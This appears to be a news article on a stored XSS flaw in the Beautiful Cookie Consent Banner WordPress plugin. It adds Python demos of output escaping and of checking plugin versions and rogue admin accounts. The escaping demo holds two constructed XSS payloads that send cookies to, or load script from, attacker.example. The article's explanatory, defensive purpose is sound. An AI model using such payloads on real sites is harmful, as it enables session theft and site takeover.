Whether you’ve got one of the best WordPress hosting plans or not, you could be a target for cyber criminals. That much is clear after the revelation that users of a popular WordPress plugin may be left vulnerable to cyber criminals if they’re not running the latest version.
According to researchers from WordPress-focused security company Defiant (the firm behind the Wordfence plugin), a flaw in Beautiful Cookie Consent Banner leaves sites with the plugin installed at risk of cross-site scripting (XSS) attacks.
In an XSS attack, bad actors (as hackers and cyber criminals are often called in online security circles) use a vulnerability like the one found in the plugin to inject malicious JavaScript into a website's pages. That script then runs in the browser of anyone who loads the affected page, including the site's own logged-in administrators, and from there it can steal sensitive information such as login sessions, push malware to visitors, or take over the website in question entirely.
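To make the mechanism concrete, here is an added, generic illustration of how a stored XSS flaw in a settings-driven banner works and how output escaping closes it. It is not the plugin's code and makes no claim about which of its settings was affected: the banner, the link settings and the attacker payloads are all constructed for the example.

```python
import html
from urllib.parse import urlparse

# Constructed illustration, not the plugin's code: a cookie banner whose
# "Privacy policy" link text and URL are taken from a settings form that an
# attacker can reach. Saved once, the banner is rendered to every visitor,
# including logged-in administrators, so the injected script runs with
# whatever privileges the viewer has.

def render_banner_unsafe(link_text: str, link_url: str) -> str:
    """Vulnerable: the saved settings are dropped straight into the markup."""
    return ('<div class="cookie-banner">We use cookies. '
            f'<a href="{link_url}">{link_text}</a></div>')


def safe_url(url: str) -> str:
    """Allow only absolute http(s) URLs; anything else (javascript:, data:,
    or an attribute break-out attempt) is replaced by a harmless '#'."""
    cleaned = url.strip()
    parsed = urlparse(cleaned)
    if parsed.scheme in ("http", "https") and parsed.netloc:
        return cleaned
    return "#"


def render_banner_safe(link_text: str, link_url: str) -> str:
    """Hardened: escape the text for an HTML body, escape the URL for an
    attribute value, and reject non-http(s) schemes before output."""
    return ('<div class="cookie-banner">We use cookies. '
            f'<a href="{html.escape(safe_url(link_url), quote=True)}">'
            f'{html.escape(link_text, quote=True)}</a></div>')


def executes_script(markup: str) -> bool:
    """Crude indicator for the demo only: does the markup contain an
    unescaped script tag, an injected event handler, or a javascript: URL?"""
    lowered = markup.lower()
    return ('<script' in lowered
            or ' onmouseover=' in lowered
            or 'href="javascript:' in lowered)


# Constructed attacker input: one payload breaks out of the href attribute to
# add an event handler that leaks cookies, the other injects a script tag via
# the link text.
EVIL_URL = '" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)'
EVIL_TEXT = 'Privacy policy<script src="https://attacker.example/x.js"></script>'

if __name__ == "__main__":
    print("unsafe:", render_banner_unsafe(EVIL_TEXT, EVIL_URL))
    print("safe:  ", render_banner_safe(EVIL_TEXT, EVIL_URL))
```

The unsafe renderer emits `<a href="" onmouseover="fetch(...)">` followed by a live `<script>` tag; the hardened one emits `href="#"` and the script tag as inert `&lt;script&gt;` text. In a real WordPress plugin the same job is done with the core escaping functions (`esc_attr`, `esc_url`, `esc_html`) at output time.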
Up to 3 Million Attacks on 1.5 Million Sites Linked to Flaw
Ram Gall, a security researcher and part of the Defiant team, shared full details of the vulnerability on the Wordfence website.
The short version is that the Beautiful Cookie Consent Banner flaw lets an attacker plant script that runs when an administrator views the affected site. Because it executes with the administrator's own session, that script can create a rogue WordPress admin account, which in turn gives the attacker access to, and control of, the entire website.
He says that up to 1.5 million websites may have been targeted by as many as 3 million separate attacks, all related to the Beautiful Cookie Consent Banner flaw. If that’s enough bad news for a weekend, don’t worry — there’s a silver lining to this particular cloud.
What Beautiful Cookie Users Should Do Right Now
Gall adds that Beautiful Cookie’s creators have already released a patch addressing the flaw. This means it’s easy to protect yourself and your website against the vulnerability mentioned above.
To make sure you're protected against this flaw, anyone using (or thinking of using) the plugin should confirm they are running version 2.10.2 or later. That is the current release and the one you should get if you install the plugin fresh, but it's worth checking the version shown on your Plugins screen just in case.
Webmasters with older versions of the plugin are being urged to update to the patched release as a matter of urgency, even though Gall and his team don't rate the vulnerability as critical in its present form. Updating closes the hole but doesn't undo anything an attacker may already have done: if your site sat on a vulnerable version while the attacks were under way, also review your user list for administrator accounts you didn't create.
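Both checks can be scripted. The following is an added example, not code from the plugin or from Wordfence: it reads the version from the standard `Version:` line of a WordPress plugin's header comment, compares it numerically against 2.10.2, and flags administrator accounts that aren't on a list of logins you recognise. The plugin header text, the version numbers it contains and the user rows are all constructed for the example.

```python
import re
from typing import Iterable, List, Optional, Set, Tuple

# The release the article names as containing the fix.
PATCHED_VERSION = (2, 10, 2)


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.10.1' -> (2, 10, 1). Compare numerically: as plain strings,
    '2.10.10' < '2.10.2' and '2.9' > '2.10', which is exactly wrong."""
    parts = tuple(int(p) for p in re.findall(r"\d+", text))
    return parts or (0,)


def plugin_version_from_header(php_source: str) -> Optional[str]:
    """WordPress plugins declare their version in a 'Version:' line of the
    header comment at the top of the plugin's main PHP file."""
    match = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)",
                      php_source, re.MULTILINE)
    return match.group(1) if match else None


def needs_update(php_source: str) -> bool:
    """True when the installed version is older than the patched release,
    or when no version can be read at all (unknown is treated as unpatched)."""
    version = plugin_version_from_header(php_source)
    if version is None:
        return True
    return parse_version(version) < PATCHED_VERSION


def unexpected_admins(users: Iterable[Tuple[str, str, str]],
                      known_admins: Set[str]) -> List[str]:
    """users: (login, email, role) rows. Returns administrator logins that are
    not on your allow-list, i.e. the kind of account this attack creates."""
    return sorted(login for login, _email, role in users
                  if role == "administrator" and login not in known_admins)


# Constructed plugin header; the version numbers are illustrative only.
HEADER_OLD = """<?php
/**
 * Plugin Name: Beautiful Cookie Consent Banner
 * Version: 2.10.1
 */
"""
HEADER_PATCHED = HEADER_OLD.replace("2.10.1", "2.10.2")

# Constructed user export, the shape you would get from the Users screen
# or from `wp user list --role=administrator`.
SAMPLE_USERS = [
    ("alice", "alice@example.com", "administrator"),
    ("bob", "bob@example.com", "editor"),
    ("wp_support_1", "noreply@attacker.example", "administrator"),
]

if __name__ == "__main__":
    print("old header needs update:", needs_update(HEADER_OLD))
    print("patched header needs update:", needs_update(HEADER_PATCHED))
    print("unexpected admins:", unexpected_admins(SAMPLE_USERS, {"alice"}))
```

On a live site, feed `plugin_version_from_header` the contents of the plugin's main PHP file under `wp-content/plugins/`, and build the allow-list from the administrators you know you created; any login the function returns deserves a closer look before you delete it.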